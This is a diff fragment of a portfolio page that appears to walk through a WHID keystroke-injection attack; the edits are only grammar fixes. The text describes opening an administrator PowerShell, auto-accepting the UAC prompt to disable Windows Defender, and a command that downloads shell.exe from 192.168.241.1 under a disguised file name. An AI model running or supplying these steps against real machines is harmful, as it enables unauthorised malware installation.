Riqky/portfolio/_pages/whid.md

 Press:216+176
 ```

 The first line uses the Arduino codes again to press `control`, `shift` and `enter`.
-This will run the given command (`powershell`) as administrator, we need this to disable Windows Defender.
-The second line will type the left arrow and `enter`, so that the UAC (admin-prompt) is answered with `yes`.
+This will run the given command (`powershell`) as an administrator, we need this to disable Windows Defender.
+The second line will type the left arrow and `enter` so that the UAC (admin-prompt) is answered with `yes`.

 ```powershell
 PrintLine:(New-Object System.Net.WebClient).DownloadFile("http://192.168.241.1/shell.exe", "$env:APPDATA\..\Local\Microsoft\Windows\0\wincore.exe")